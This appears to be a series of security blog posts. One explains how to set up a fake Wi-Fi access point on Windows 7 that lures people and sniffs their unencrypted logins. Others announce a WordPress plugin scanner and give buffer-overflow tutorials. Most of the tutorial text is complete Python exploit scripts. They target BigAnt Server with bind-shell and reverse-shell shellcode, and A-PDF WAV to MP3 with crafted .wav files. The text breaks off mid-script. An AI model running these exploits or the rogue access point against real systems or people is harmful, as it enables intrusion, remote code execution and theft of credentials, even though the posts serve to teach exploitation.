Making an fake access point in Windows 7 it’s now really simple. Thanks to the new Wireless Hosted Networks technology introduced on Windows 7 and Windows Server 2008 R2 is possible to share an Internet connection from both a LAN and WIFI interface.
First off we need to create a new Wifi (Mini Adapter) interface, ssid and key. Since we can’t create a fake access point without authentication a good strategy is to put the key on ssid so people can connect to it:
C:\windows\system32>netsh wlan set hostednetwork mode=allow ssid="FreeWifi Key:12345678" key=12345678
The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.
Then we need to select the interface whence we would like to share our Internet connection. To do that you should go to Control Panel -> Network and Internet -> Network Connections, right click on the WIFI or LAN interface, properties and select the second Wifi Network Connection created right before. For this example I used the LAN interface as in the following picture.
Finally, we need to turn on the new Wifi:
C:\windows\system32>netsh wlan start hostednetwork
The hosted network started.
and that’s it! Let’s wait…
Now to see if a victim is connected to our fake access point we need the following command:
C:\windows\system32>netsh wlan show hostednetwork
Hosted network settings
-----------------------
Mode : Allowed
SSID name : "FreeWifi Key:12345678"
Max number of clients : 100
Authentication : WPA2-Personal
Cipher : CCMP
Hosted network status
---------------------
Status : Started
BSSID : ac:81:12:6f:eb:46
Radio type : 802.11b
Channel : 11
Number of clients : 1
xx:xx:xx:xx:xx:xx Authenticated
Obviously since we control the network we can sniff the traffic and all unencrypted traffic will be visible as shown in the following HTTP WordPress authentication:
Today 17 March in Italy is national holiday so I have spent my spare time to write a little tool: wpmap.py
As you can image, wpmap is a tool to discover the most installed plugins on WordPress platform. It could be useful when during a penetration testing you have time to download the plugin source code and find some issues.
Menu:
$ python wpmap.py
Simple Wordpress scanner to enumerate installed plugins by Michele `m7x` Manzotti
Version 1.0 Plugins: 104 EDB-ID: 2011-01-08
Usage: wpmap.py --site <target>
Options:
-h, --help show this help message and exit
-s SITE, --site=SITE Wordpress site
-d DIRECTORY, --directoy=DIRECTORY
Subdirectory Wordpress site
-e, --exploit Show exploit-db ID [default: False]
-v, --verbose Verbose mode[default: False]
Some screenshots:
with “-e” option:
Download:
svn co https://wpmap.svn.sourceforge.net/svnroot/wpmap wpmap
In the previous tutorial we have seen some technique of buffer overflow, in most cases with the aim to overwrite the EIP with a jump esp opcode. Now let’s see how to exploit a buffer overflow through the technique of SEH.
SEH, Structured Exception Handler, it’s a component for catching and handling exceptions. Basically exception handlers are used by programmers when the program reaches a point of no return, such as a BOF. At this point the exception handler loads in the memory blocks of code and when it finds one that resolves the problem, then the program returns to run correctly.
The exploit takes advantage of this exception handler that loads the exceptions sequentially and at the beginning of each block exception there is the address that points to the next exception NEXT SEH.
So if the current block exception does not solve the problem, the program reads the NEXT SEH, that is the address that points to the next exception, and executes the block in that exception, until the end of all exceptions. If it finds one that can solve the problem, obviously the program ends.
Not all the programs with SEH are vulnerable, but only those where you can overwrite the SEH NEXT, the address that points to the next except, with arbitrary memory location. To check whether the program uses a vulnerable SEH OllyDbg is sufficient to load the plugin OllySSEH.
If we can see dlls where the SEH is vulnerable then we could overwrite the SEH address with a pop pop ret opcode so that program flow is directed to the NEXT SEH, which will contain a jump to the shellcode .
First of all we look for an application vulnerable to SEH, e.g. BigAnt Server, as shown by the following exploits tested on a Windows XP SP3 and then we try to run on Windows 7:
#!/usr/bin/python# BigAnt Server version 2.50 SEH Overwrite - 0day# Written and discovered by Blake# Tested on Windows XP SP3## $ ./bigant.py 192.168.1.131 6660## [*] BigAnt Server v2.50 SEH Overwrite 0day# [*] Written and discovered by Blake# [*] Tested on Windows XP SP3## [+] Connecting to 192.168.1.131 on port 6660# [+] Sending payload# [+] Connect to bind shell on port 4444## $ nc 192.168.1.131 4444# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\WINDOWS\system32>importsocket, sysiflen(sys.argv)!= 3:
print"\n[*] Usage: %s \n"%sys.argv[0]sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])# port 6660 by default# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49""\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a""\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32""\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49""\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b""\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b""\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a""\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51""\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50""\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37""\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47""\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f""\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c""\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b""\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49""\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c""\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51""\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f""\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42""\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50""\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48""\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38""\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49""\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43""\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51""\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36""\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42""\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51""\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a""\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50""\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48""\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53""\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48""\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46""\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51""\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39""\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46""\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48""\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42""\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57""\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50""\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59""\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b""\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33""\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45""\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36""\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41"*985# seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"# short jump 6 bytes
seh = "\x6a\x19\x9a\x0f"# p/p/r from vbajet32.dll
nops = "\x90"*10# nop sled
sc = shellcode # 710 bytes available for shellcodeprint"\n[*] BigAnt Server v2.50 SEH Overwrite 0day"print"[*] Written and discovered by Blake"print"[*] Tested on Windows XP SP3\n"print"[+] Connecting to %s on port %d"%(host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((host,port))except:
print"[x] Error establishing connection\n"sys.exit(0)print"[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()print"[+] Connect to bind shell on port 4444\n"# milw0rm.com [2009-09-15]
Our goal is to make it work for Windows 7. With simple fixes we can adapt it to our needs and at the same time understand how to exploit a BOF with the SEH technique. Just like in the first tutorial, we calculate the offset:
#!/usr/bin/python# BigAnt Server version 2.50 SEH Overwrite - 0day# Written and discovered by Blake# Tested on Windows XP SP3## $ ./bigant.py 192.168.1.131 6660## [*] BigAnt Server v2.50 SEH Overwrite 0day# [*] Written and discovered by Blake# [*] Tested on Windows XP SP3## [+] Connecting to 192.168.1.131 on port 6660# [+] Sending payload# [+] Connect to bind shell on port 4444## $ nc 192.168.1.131 4444# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\WINDOWS\system32>importsocket, sysiflen(sys.argv)!= 3:
print"\n[*] Usage: %s \n"%sys.argv[0]sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])# port 6660 by default# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("")
payload = "Aa0Aa1Aa2A..."
next_seh = "\xeb\x06\x90\x90"# short jump 6 bytes
seh = "\x6a\x19\x9a\x0f"# p/p/r from vbajet32.dll
nops = "\x90"*10# nop sled
sc = shellcode # 710 bytes available for shellcodeprint"\n[*] BigAnt Server v2.50 SEH Overwrite 0day"print"[*] Written and discovered by Blake"print"[*] Tested on Windows XP SP3\n"print"[+] Connecting to %s on port %d"%(host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((host,port))except:
print"[x] Error establishing connection\n"sys.exit(0)print"[+] Sending payload"
s.send("GET " + payload + "\r\n\r\n")
s.close()print"[+] Connect to bind shell on port 4444\n"# milw0rm.com [2009-09-15]
We attach BigAnt to OllyDbg and launch the exploit.
Obviously the application crashes, but in “view” -> “seh chain” we can see the value about SEH (30684239 in my case). Now we can calculate the exact offset for Windows 7:
This means that the SEH will be overwritten after exactly 989 bytes and the NEXT SEH after 985 (989-4).
So the exploit will be like this: [985 bytes of payload] [NEXT SEH] [SEH] [nops] [shellcode].
NEXT SEH will be overwritten with the address “\xeb\x06\x90\x90″, an unconditional jump of 6 bytes to point to the nops at the beginning of the shellcode, and the SEH will be overwritten with an address that points to a pop pop ret opcode. This is because when an exception occurs, the dispatcher creates its own frame on the stack. In this frame the NEXT SEH is at ESP +8. So to overwrite it will be necessary a pop pop ret opcode which pushes 8 bytes out from the stack and gets the current value from the stack (top ESP) and puts it in the EIP.
This opcode can be found and exploited in the VBAJET32.dll with “0F9A19CD” address. So the new exploit will be as the following:
#!/usr/bin/python# BigAnt Server version 2.50 SEH Overwrite - 0day# Written and discovered by Blake# Tested on Windows XP SP3## $ ./bigant.py 192.168.1.131 6660## [*] BigAnt Server v2.50 SEH Overwrite 0day# [*] Written and discovered by Blake# [*] Tested on Windows XP SP3## [+] Connecting to 192.168.1.131 on port 6660# [+] Sending payload# [+] Connect to bind shell on port 4444## $ nc 192.168.1.131 4444# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\WINDOWS\system32>importsocket, sysiflen(sys.argv)!= 3:
print"\n[*] Usage: %s \n"%sys.argv[0]sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])# port 6660 by default# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("\x42"*2000)
payload = "\x41"*985# seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"# short jump 6 bytes
seh = "\xcd\x19\x9a\x0f"# 0F9A19CD p/p/r from vbajet32.dll
nops = "\x90"*10# nop sled
sc = shellcode # 710 bytes available for shellcodeprint"\n[*] BigAnt Server v2.50 SEH Overwrite 0day"print"[*] Written and discovered by Blake"print"[*] Tested on Windows XP SP3\n"print"[+] Connecting to %s on port %d"%(host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((host,port))except:
print"[x] Error establishing connection\n"sys.exit(0)print"[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()print"[+] Connect to bind shell on port 4444\n"# milw0rm.com [2009-09-15]
Running OllyDbg and setting a breakpoint in the address of pop pop ret “0F9A19CD” we realize that the application reaches this address (if not it means that we have done something wrong), and after the jump reaches the shellcode.
At this point you can replace the shellcode with something more interesting such as a reverse shell tcp:
#!/usr/bin/python# BigAnt Server version 2.50 SEH Overwrite - 0day# Written and discovered by Blaked# Tested on Windows XP SP3## $ ./bigant.py 192.168.1.131 6660## [*] BigAnt Server v2.50 SEH Overwrite 0day# [*] Written and discovered by Blake# [*] Tested on Windows XP SP3## [+] Connecting to 192.168.1.131 on port 6660# [+] Sending payload# [+] Connect to bind shell on port 4444## $ nc 192.168.1.131 4444# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\WINDOWS\system32>importsocket, sysiflen(sys.argv)!= 3:
print"\n[*] Usage: %s \n"%sys.argv[0]sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])# port 6660 by default# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("\xda\xc9\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49\x49""\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41""\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42""\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49""\x6c\x49\x78\x4f\x79\x47\x70\x43\x30\x45\x50\x45\x30\x4c\x49""\x4d\x35\x46\x51\x48\x52\x45\x34\x4c\x4b\x42\x72\x44\x70\x4e""\x6b\x50\x52\x46\x6c\x4e\x6b\x50\x52\x46\x74\x4e\x6b\x51\x62""\x46\x48\x44\x4f\x4f\x47\x42\x6a\x45\x76\x45\x61\x49\x6f\x44""\x71\x4b\x70\x4c\x6c\x45\x6c\x45\x31\x43\x4c\x46\x62\x44\x6c""\x51\x30\x4b\x71\x48\x4f\x44\x4d\x43\x31\x4f\x37\x4a\x42\x48""\x70\x51\x42\x43\x67\x4e\x6b\x50\x52\x44\x50\x4c\x4b\x50\x42""\x47\x4c\x46\x61\x48\x50\x4e\x6b\x43\x70\x42\x58\x4b\x35\x49""\x50\x44\x34\x43\x7a\x46\x61\x4e\x30\x42\x70\x4c\x4b\x51\x58""\x42\x38\x4c\x4b\x43\x68\x51\x30\x43\x31\x4b\x63\x48\x63\x45""\x6c\x50\x49\x4e\x6b\x46\x54\x4c\x4b\x45\x51\x49\x46\x44\x71""\x49\x6f\x46\x51\x4f\x30\x4c\x6c\x4b\x71\x48\x4f\x46\x6d\x43""\x31\x48\x47\x47\x48\x49\x70\x42\x55\x49\x64\x44\x43\x43\x4d""\x4c\x38\x45\x6b\x51\x6d\x51\x34\x51\x65\x49\x72\x43\x68\x4c""\x4b\x51\x48\x44\x64\x43\x31\x4b\x63\x42\x46\x4c\x4b\x44\x4c""\x50\x4b\x4e\x6b\x50\x58\x45\x4c\x45\x51\x4a\x73\x4c\x4b\x45""\x54\x4e\x6b\x47\x71\x4a\x70\x4d\x59\x43\x74\x47\x54\x46\x44""\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x50\x51\x49\x6f\x4b""\x50\x42\x78\x43\x6f\x43\x6a\x4c\x4b\x42\x32\x48\x6b\x4e\x66""\x51\x4d\x50\x68\x44\x73\x46\x52\x47\x70\x45\x50\x45\x38\x50""\x77\x51\x63\x46\x52\x43\x6f\x46\x34\x42\x48\x42\x6c\x51\x67""\x51\x36\x46\x67\x49\x6f\x48\x55\x48\x38\x4a\x30\x45\x51\x45""\x50\x47\x70\x51\x39\x4b\x74\x42\x74\x46\x30\x42\x48\x47\x59""\x4f\x70\x42\x4b\x43\x30\x4b\x4f\x4a\x75\x50\x50\x46\x30\x50""\x50\x50\x50\x47\x30\x50\x50\x47\x30\x42\x70\x42\x48\x4b\x5a""\x46\x6f\x4b\x6f\x4b\x50\x49\x6f\x4a\x75\x4d\x47\x43\x5a\x43""\x35\x45\x38\x4f\x30\x4e\x48\x43\x31\x45\x56\x42\x48\x45\x52""\x43\x30\x47\x61\x43\x6c\x4f\x79\x4b\x56\x42\x4a\x42\x30\x50""\x56\x46\x37\x50\x68\x4f\x69\x4e\x45\x43\x44\x43\x51\x49\x6f""\x4e\x35\x4f\x75\x4f\x30\x50\x74\x46\x6c\x4b\x4f\x50\x4e\x44""\x48\x50\x75\x48\x6c\x51\x78\x48\x70\x4f\x45\x4d\x72\x43\x66""\x49\x6f\x4e\x35\x51\x7a\x43\x30\x51\x7a\x44\x44\x50\x56\x51""\x47\x42\x48\x43\x32\x4e\x39\x49\x58\x43\x6f\x4b\x4f\x48\x55""\x4e\x6b\x44\x76\x50\x6a\x43\x70\x51\x78\x45\x50\x46\x70\x43""\x30\x43\x30\x50\x56\x43\x5a\x45\x50\x43\x58\x46\x38\x4c\x64""\x51\x43\x4a\x45\x4b\x4f\x4a\x75\x4f\x63\x50\x53\x51\x7a\x43""\x30\x51\x46\x43\x63\x46\x37\x51\x78\x46\x62\x4a\x79\x4a\x68""\x43\x6f\x49\x6f\x48\x55\x46\x61\x4b\x73\x51\x39\x48\x46\x4b""\x35\x4a\x56\x44\x35\x48\x6c\x4f\x33\x46\x6a\x41\x41");
payload = "\x41"*985# seh overwritten at 989
next_seh = "\xeb\x06\x90\x90"# short jump 6 bytes
seh = "\xcd\x19\x9a\x0f"# 0F9A19CD p/p/r from vbajet32.dll
nops = "\x90"*10# nop sled
sc = shellcode # 710 bytes available for shellcode
padding = "\x90"*1300print"\n[*] BigAnt Server v2.50 SEH Overwrite 0day"print"[*] Written and discovered by Blake"print"[*] Tested on Windows XP SP3\n"print"[+] Connecting to %s on port %d"%(host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
s.connect((host,port))except:
print"[x] Error establishing connection\n"sys.exit(0)print"[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + padding + "\r\n\r\n")
s.close()print"[+] Connect to bind shell on port 4444\n"# milw0rm.com [2009-09-15]
After having fully understood the tutorial part 1 let’s go to read the second one. In this tutorial we will see further techniques to exploit a BOF of the program a-pdf, a tool to convert WAV to MP3.
JUMP or CALL
With these techniques you use a register that contains the address where the shellcode resides and put it in EIP. This technique has been described in the tutorial part 1, with variant that could be used with a call instead of jmp.
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
buff = ("\x41"*4128);# 1002F1C3 call esp in lame_enc.dll
eip = ("\xc3\xf1\x02\x10");
nops = ("\x90"*16);
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = (buff + eip + nops + shellcode);try:
f1 = open("Drop.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
POP RETURN
If any register points directly to the shellcode but you can see the address on the stack (first, second, third address in the stack) that points to the shellcode then you can load that value into EIP by first putting a pointer to pop ret or pop pop ret (depending on where the location is found on the stack ) into EIP.
In the first tutorial we have seen that the shellcode was located exactly into EIP, it was necessary to add more 8 nops so the shellcode began at first byte.
Let’s suppose that the shellcode is located after 8 bytes. To catch it we could use a pop pop ret, by looking for in dll loaded, and then load the jmp esp to point directly to the shellcode. So we have an address that points to a pop pop ret opcode into EIP and soon after the 8 bytes (junk) there is the jmp esp opcode that jumps to the shellcode.
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
buff = ("\x41"*4128);# 00428F3F jmp esp in wavtomp3.exe# 10034207 pop pop ret in lame_enc.dll
eip = ("\x07\x42\x03\x10");
esp = ("\x3f\x8f\x42\x00");
junk = ("\x42"*8);
nops = ("\x90"*4);
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = (buff + eip + junk + esp + nops +shellcode);try:
f1 = open("Drop2.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
PUSH RETURN
This techinque is a little bit different from CALL a register approach. If you don’t find out anywhere a jmp or call reg opcode then you could put the address directly into the stack and do a ret. Basically you look for a push reg followed by a ret and then you put the address of this opcode into eip.
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
buff = ("\x41"*4128);# 0047A01D push esp ret in wavtomp3.exe
eip = ("\x1d\xa0\x47\x00");
nops = ("\x90"*4);
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4""\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15""\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3""\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd""\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99""\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28""\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa""\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a""\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7""\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88""\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a""\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73""\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02""\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86""\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60""\xc8\x29\x9e");
sploit = (buff + eip + nops +shellcode);try:
f1 = open("Drop3.wav","w");#No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();print('[*] Success. Load File.');except:
print("[-] Error, could not write the file.");
JUMP [reg + offset]
If there is a register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or dll’s application, which will add the required bytes to the register and then jumps to the register. E.g. a jmp dword ptr [esp+8].
BLIND RETURN
A RET instruction pop the last value (4bytes) from the stack and put that address in ESP. So if you overwrite EIP with the address that perform a RET instruction, you load the value stored at ESP into EIP.
We need to:
- Overwrite the eip with the address that points to ret opcode
- Enter the address that points to the shellcode in the first 4 bytes of the ESP
So when the ret is executed, the last added 4 bytes are popped from the stack and put in EIP.
#!/usr/bin/env python# http://www.exploit-db.com/exploits/14681/################################################################################### Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit# Exloit By: Dr_IDE# Tested On: XPSP3# Date: August 18, 2010# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html# Reference: http://www.exploit-db.com/exploits/14676/# Usage: Import File, Select It, Click Play, Calc.## EDB Notes:# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct# EIP overwrite which is operating system specific.################################################################################### windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
